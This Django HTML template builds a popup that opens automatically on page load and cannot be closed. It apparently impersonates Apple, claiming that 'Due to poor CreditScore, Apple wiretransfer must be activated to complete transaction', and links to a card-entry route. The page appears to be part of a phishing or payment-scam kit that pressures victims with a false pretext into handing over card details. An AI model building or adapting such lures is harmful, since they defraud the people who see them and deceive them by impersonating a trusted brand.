{% load staticfiles %}

<!DOCTYPE html>
<html>
<header>
    <style>
        #overlay {
            display: none;
            position: fixed;
            left: 0px;
            top: 0px;
            width: 100%;
            height: 100%;
            z-index: 99999;
        }
        
        #popup {
            border-radius: 10px;
            display: none;
            position: fixed;
            left: 50%;
            top: 25%;
            width: 400px;
            height: 400px;
            margin-top: -50px;
            margin-left: -200px;
            background: #FFFFFF;
            border: 2px solid #000;
            z-index: 100000;
        }
        
        .back {
            background: black;
            height: 630px;
        }
        
        .load {
            position: relative;
            top: 5%;
            left: 25%;
        }
        
        .trans {
            position: relative;
            border: 1px solid black;
            width: 80%;
            left: 30px;
            padding: 10px 10px 10px;
            border-radius: 10px;
            text-align: center;
        }
        
        .activate {
            left: 80px;
            top: 50px;
            position: relative;
        }
        
        .zoomIn {
            -webkit-animation-name: zoomIn;
            animation-name: zoomIn;
            -webkit-animation-duration: 1s;
            animation-duration: 1s;
            -webkit-animation-fill-mode: both;
            animation-fill-mode: both;
        }
        /* controls the animation of Entrepreneur account popup */
        
        .zoomInreadmore {
            -webkit-animation-name: zoomIn;
            animation-name: zoomIn;
            -webkit-animation-duration: 0.1s;
            animation-duration: 0.1s;
            -webkit-animation-fill-mode: both;
            animation-fill-mode: both;
        }
        
        @-webkit-keyframes zoomIn {
            0% {
                opacity: 0;
                -webkit-transform: scale3d(.3, .3, .3);
                transform: scale3d(.3, .3, .3);
            }
            50% {
                opacity: 1;
            }
        }
        
        @keyframes zoomIn {
            0% {
                opacity: 0;
                -webkit-transform: scale3d(.3, .3, .3);
                transform: scale3d(.3, .3, .3);
            }
        }
        
        @media only screen and (min-width:150px) and (max-width:680px) {
            #overlay {
                display: none;
                position: fixed;
                left: 0px;
                top: 0px;
                width: 50%;
                height: 100%;
                z-index: 99999;
            }
        }
    </style>
</header>

<body>


    <div class="back">
        <div id="overlay" class="overlay"></div>
        <div id="popup" class="popup">
            <img class="load" src="{% static 'image/Spinner.gif' %}" />
            <div class="trans">Due to poor CreditScore ,Apple wiretransfer must be activated to complete transaction</div>
            <a class="activate" href="{% url 'rise:Card' %}"> ACTIVATE APPLE WIRETRANSFER</a>


        </div>
    </div>
    <script>
        window.onload = function() {

            var overlay = document.getElementById("overlay");

            var popup = document.getElementById("popup");
            overlay.style.display = "block";
            popup.style.display = "block";
            overlay.className = 'zoomIn';
            popup.className = 'zoomIn';



            document.getElementById("CloseBtn").onclick = function() {
                var overlay = document.getElementById("overlay");
                var popup = document.getElementById("popup");
                overlay.style.display = "none";
                popup.style.display = "none";
            }
        };
    </script>

</body>

</html>